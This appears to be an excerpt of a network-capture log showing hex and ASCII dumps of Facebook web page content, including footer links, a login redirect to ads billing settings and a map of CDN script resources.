a8 d9 8a d8 a9 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76
                                                                                    Data Ascii: ook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"></a></li><li><a class="_sv
                                                                                    2023-02-07 18:46:13 UTC1153INData Raw: 65 62 6f 6f 6b 2e 63 6f 6d 25 32 35 32 46 61 64 73 25 32 35 32 46 6d 61 6e 61 67 65 72 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 68 34 53 77 72 63 38 74 69 57 4a 20 73 78 5f 38 65 64 33 39 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 6f 6f 74 65 72 43 68 69 6c 64 72
                                                                                    Data Ascii: ebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_h4Swrc8tiWJ sx_8ed39e"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildr
                                                                                    2023-02-07 18:46:13 UTC1155INData Raw: 4b 33 44 6c 67 68 45 61 63 66 70 30 6a 76 38 4e 74 46 6d 50 67 5f 76 62 31 52 42 77 61 59 6e 32 52 7a 6b 6f 5f 4e 59 45 6f 46 4e 4e 37 6f 78 30 61 32 6f 63 74 63 63 6b 76 68 51 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 61 73 79 6e 63 6c 61 7a 79 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 74 69 6e 3c 2f 61 3e
                                                                                    Data Ascii: K3DlghEacfp0jv8NtFmPg_vb1RBwaYn2Rzko_NYEoFNN7ox0a2octcckvhQ" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a>
                                                                                    2023-02-07 18:46:13 UTC1156INData Raw: 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
                                                                                    Data Ascii: careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https:/
                                                                                    2023-02-07 18:46:13 UTC1158INData Raw: 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 56 54 73 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 73 36 73 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 39 38 6f 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 68 30 73 22 7d 2c 22 32 32 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 4d 61 63 5f 51 39 6a 41 4c 56 47 74 64 58 59 4d
                                                                                    Data Ascii: "result":false,"hash":"AT7yrb5QuQ92736uVTs"},"3212":{"result":true,"hash":"AT7tgdobiEoC5qOAs6s"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq498o"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZh0s"},"2257":{"result":false,"hash":"AT5Mac_Q9jALVGtdXYM
                                                                                    2023-02-07 18:46:13 UTC1159INData Raw: 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 39 6e 32 4c 35 77 41 33 55 6a 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 73 4d 63 64 31 30 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 52 5c 2f 72 5c 2f 6e 39 6b 74 7a 48 50 6b 6e 47 78 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4a 4d 49 59 71 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e
                                                                                    Data Ascii: \/rsrc.php\/v3\/y4\/r\/9n2L5wA3Ujb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"msMcd10":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yR\/r\/n9ktzHPknGx.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"JMIYqAc":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.
                                                                                    2023-02-07 18:46:13 UTC1160INData Raw: 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 35 5c 2f 72 5c 2f 4f 4a 67 49 66 64 73 63 58 49 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 43 47 6b 48 34 46 59 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 78 34 45 79 70 39 6e 51 31 75 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 67 6f 49 43 31 36 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a
                                                                                    Data Ascii: "src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y5\/r\/OJgIfdscXIR.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"CGkH4FY":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"goIC16j":{"type":"css","src":
                                                                                    2023-02-07 18:46:13 UTC1162INData Raw: 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 46 45 66 4e 4d 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 61 4f 36 34 5c 2f 79 42 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 74 31 42 6c 55 32 54 57 6c 75 43 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 34 58 6c 44 78 62 30 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 70 5c 2f 72 5c 2f 50 6b 46 41 75 67 77 36 48 2d 5f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33
                                                                                    Data Ascii: 5Kz","nc":1},"IFEfNMl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iaO64\/yB\/l\/en_US\/t1BlU2TWluC.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"4XlDxb0":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yp\/r\/PkFAugw6H-_.js?_nc_x=Ij3
                                                                                    2023-02-07 18:46:13 UTC1163INData Raw: 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 74 5c 2f 72 5c 2f 66 75 30 48 7a 55 61 64 57 44 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 47 70 51 46 42 77 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 49 5c 2f 72 5c 2f 43 33 43 6e 6d 4c 44 59 75 41 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 6b 44 72 6d 4b 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70
                                                                                    Data Ascii: src.php\/v3\/yt\/r\/fu0HzUadWDw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"GpQFBwL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yI\/r\/C3CnmLDYuAn.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IkDrmKR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php
                                                                                    2023-02-07 18:46:13 UTC1165INData Raw: 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4b 5c 2f 72 5c 2f 4a 51 45 4d 63 38 6f 6f 68 77 66 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 66 34 34 6f 52 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 46 56 43 34 5c 2f 79 34 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 53 4c 42 77 2d 35 71 32 59 71 72 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 70 56 6a 32 4c 78 74 22 3a 7b
                                                                                    Data Ascii: ":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/r\/JQEMc8oohwf.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ff44oRG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iFVC4\/y4\/l\/en_US\/SLBw-5q2Yqr.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"pVj2Lxt":{
                                                                                    2023-02-07 18:46:13 UTC1166INData Raw: 5c 2f 42 4e 32 4b 66 47 77 57 55 50 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 77 45 77 71 49 33 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 75 58 66 4b 43 42 51 72 65 59 4b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 72 6a 6d 59 79 6a 46 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 47 5c 2f 6c 5c 2f 30 2c 63 72
                                                                                    Data Ascii: \/BN2KfGwWUPQ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"EwEwqI3":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/uXfKCBQreYK.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"rjmYyjF":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/l\/0,cr
                                                                                    2023-02-07 18:46:13 UTC1168INData Raw: 22 4c 5c 2f 37 37 36 47 49 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 54 5c 2f 72 5c 2f 78 47 5f 45 4a 69 5a 61 2d 77 2d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 39 4b 58 52 48 46 62 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 32 49 41 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 31 59 78 4b 50 56 31 6c 72 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e
                                                                                    Data Ascii: "L\/776GI":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yT\/r\/xG_EJiZa-w-.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"9KXRHFb":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i2IA4\/yK\/l\/en_US\/A1YxKPV1lrP.js?_nc_x=Ij3Wp8lg5Kz","n
                                                                                    2023-02-07 18:46:13 UTC1169INData Raw: 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 5c 2f 6d 72 35 56 45 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 64 61 74 61 3a 74 65 78 74 5c 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 49 32 4a 76 62 33 52 73 62 32 46 6b 5a 58 4a 66 55 46 39 74 63 6a 56 57 52 58 74 6f 5a 57 6c 6e 61 48 51 36 4e 44 4a 77 65 44 74 39 4c 6d 4a 76 62 33 52 73 62 32 46 6b 5a 58 4a 66 55 46 39 74 63 6a 56 57 52 58 74 6b 61 58 4e 77 62 47 46 35 4f 6d 4a 73 62 32 4e 72 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 22 2c 22 6e 63 22 3a 31 2c 22 64 22 3a 31 7d 7d 2c 22 63 6f 6d 70 4d 61 70 22 3a 7b 22 44 6f 63 6b 22 3a 7b 22 72 22 3a 5b 22 63 36 6b 70 52 4b 63 22 2c 22 34 44 78 73 6d 66 55 22 2c 22 64 4b 50 4a 62 71
                                                                                    Data Ascii: g5Kz","nc":1},"P\/mr5VE":{"type":"css","src":"data:text\/css; charset=utf-8;base64,I2Jvb3Rsb2FkZXJfUF9tcjVWRXtoZWlnaHQ6NDJweDt9LmJvb3Rsb2FkZXJfUF9tcjVWRXtkaXNwbGF5OmJsb2NrIWltcG9ydGFudDt9","nc":1,"d":1}},"compMap":{"Dock":{"r":["c6kpRKc","4DxsmfU","dKPJbq
                                                                                    2023-02-07 18:46:13 UTC1171INData Raw: 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 63 36 6b 70 52 4b 63 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 41 70 70 72 6f 76 61 6c 22 3a 7b 22 72 22 3a 5b 22 6a 46 45 32 72 6d 6e 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 53 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37 6e 77 37 22 2c 22 54 47 65 73 41 30 61 22 2c 22 49 46 45 66 4e 4d 6c 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 34 58 6c 44 78 62 30 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 72 57 59 37 56 61 59 22 2c 22 61 57 6f 5a 47 55 42 22 2c 22 4d 74 76 37 71 44 2b 22 2c 22 39 5a 69 72 31 75 38 22
                                                                                    Data Ascii: BanzaiScuba_DEPRECATED"],"r":["c6kpRKc"]},"be":1},"PhotoTagApproval":{"r":["jFE2rmn","uyLLtYc","msMcd10","BnbajS7","Kk81m1Y"],"be":1},"PhotoSnowlift":{"r":["foz7nw7","TGesA0a","IFEfNMl","R5w1rCJ","4XlDxb0","c6kpRKc","rWY7VaY","aWoZGUB","Mtv7qD+","9Zir1u8"
                                                                                    2023-02-07 18:46:13 UTC1172INData Raw: 72 22 3a 5b 22 6a 46 45 32 72 6d 6e 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 54 47 65 73 41 30 61 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 46 6a 52 78 47 78 50 22 2c 22 6a 46 45 32 72 6d 6e 22 2c 22 34 44 78 73 6d 66 55 22 2c 22 67 64 47 5a 31 6d 6a 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 4a 4d 49 59 71 41 63 22 2c 22 57 38 6f 4f 37 4b 77 22 2c 22 38 71 42 46 2b 76 33 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 42 6e 62 61 6a 53 37 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c
                                                                                    Data Ascii: r":["jFE2rmn","uyLLtYc","msMcd10","5p9Jgd9","BnbajS7","Kk81m1Y"],"be":1},"TagTokenizer":{"r":["TGesA0a","c6kpRKc","FjRxGxP","jFE2rmn","4DxsmfU","gdGZ1mj","msMcd10","JMIYqAc","W8oO7Kw","8qBF+v3","5p9Jgd9","Kk81m1Y","BnbajS7"],"rds":{"m":["FbtLogging","Intl
                                                                                    2023-02-07 18:46:13 UTC1174INData Raw: 22 59 30 51 72 44 74 4c 22 2c 22 68 47 53 42 6d 42 58 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 64 4b 50 4a 62 71 4a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 79 53 65 57 37 48 67 22 2c 22 55 66 71 36 59 57 58 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37
                                                                                    Data Ascii: "Y0QrDtL","hGSBmBX","5p9Jgd9","Kk81m1Y","BnbajS7","R5w1rCJ","dKPJbqJ","e9ANzw\/","ySeW7Hg","Ufq6YWX","7TVXpOy"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r":["foz7
                                                                                    2023-02-07 18:46:13 UTC1175INData Raw: 72 22 3a 5b 22 54 47 65 73 41 30 61 22 2c 22 49 46 45 66 4e 4d 6c 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 7a 5c 2f 41 4f 4d 42 6d 22 2c 22 54 4b 7a 6d 76 56 46 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 35 45 58 57 58 69 47 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 59 76 32 52 71 37 4e 22 2c 22 37 54 56 58 70 4f 79 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 54 47 65 73 41 30 61 22 2c 22 49 46 45 66 4e 4d 6c 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 61 57 6f 5a 47 55 42 22 2c 22 7a 5c 2f 41 4f 4d 42 6d 22 2c 22 30 37 49 69 57 42 5c 2f 22 2c 22 54 4b 7a 6d 76 56 46 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 67 6f 49 43 31 36 6a 22 2c 22 35 45 58 57 58 69 47 22 2c 22 42 6e 62 61 6a 53 37 22
                                                                                    Data Ascii: r":["TGesA0a","IFEfNMl","R5w1rCJ","z\/AOMBm","TKzmvVF","TjYa5zM","5EXWXiG","BnbajS7","Yv2Rq7N","7TVXpOy"],"be":1},"XUIDialogFooter.react":{"r":["TGesA0a","IFEfNMl","R5w1rCJ","aWoZGUB","z\/AOMBm","07IiWB\/","TKzmvVF","TjYa5zM","goIC16j","5EXWXiG","BnbajS7"
                                                                                    2023-02-07 18:46:13 UTC1177INData Raw: 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 31 64 52 55 36 68 30 4f 45 61 4b 49 50 71 30 4a 6b 43 6d 50 5f 7a 6f 4c 34 53 73 4e 48 58 73 58 59 77 67 50
                                                                                    Data Ascii: ":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT1dRU6h0OEaKIPq0JkCmP_zoL4SsNHXsXYwgP
                                                                                    2023-02-07 18:46:13 UTC1177INData Raw: 31 64 32 38 0d 0a 65 79 77 73 6e 39 57 39 66 70 69 42 44 52 44 55 75 6e 62 78 4b 6e 4f 44 39 6e 55 4a 75 6a 30 64 66 72 4a 33 7a 7a 49 75 41 22 2c 22 75 6e 74 72 75 73 74 65 64 5f 6c 69 6e 6b 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 30 6d 76 52 69 79 39 34 49 53 78 70 74 4c 31 39 45 73 52 39 44 69 77 61 6d 49 6c 73 59 76 36 6b 46 44 78 4f 39 65 36 49 61 36 6d 65 2d 42 71 51 4e 73 43 4e 75 2d 66 77 39 6c 65 51 44 7a 47 67 45 4b 5f 63 5f 76 63 64 59 67 39 65 46 51 76 30 77 6b 4a 42 79 78 5a 4b 4c 79 42 6a 31 76 38 4d 59 4a 70 6b 73 70 48 41 6c 43 50 6a 35 45 4e 36 68 68 68 59 74 7a 61 2d 6b 57 62 78 69 38 64 47 6f 64 50 41 4d 66 4c 6a 47 75 70 31 66 53 50 38 4c 35 61 41 22 2c 22 6c 69 6e 6b 73 68 69 6d 5f 68 6f 73 74 22 3a 22 6c 2e 66 61 63 65
